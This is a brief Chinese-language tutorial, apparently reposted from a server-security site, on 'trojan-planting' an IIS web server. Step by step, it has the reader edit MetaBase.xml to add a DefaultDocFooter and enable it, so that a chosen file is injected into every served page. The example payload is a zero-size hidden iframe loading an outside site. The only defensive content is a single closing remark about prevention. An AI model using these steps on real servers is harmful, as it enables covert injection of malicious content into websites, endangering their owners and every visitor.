MetaBase.xml文件挂马法 (1)打开MetaBase.xml文件 (2)搜索DefaultDoc关键词 (3)在DefaultDoc与DirBrowseFlags中间加入指向挂马文件所在位置的语句 例：DefaultDocFooter="file:C:\Inetpub\wwwroot\iisstart.htm" (4)在DownlevelAdminInstances=“1”下面添加语句：EnableDocFooter="True" (5)停止IIS服务，保存对MetaBase.xml文件的修改 (6)启动IIS服务 <iframe src=www.sinesafe.cn width=0 height=0></iframe>

只要懂的原理一切都好防止了.

本篇文章来源于 360服务器安全网（360mysafe.com） 原文出处：http://www.360mysafe.com/Safety/safe26.html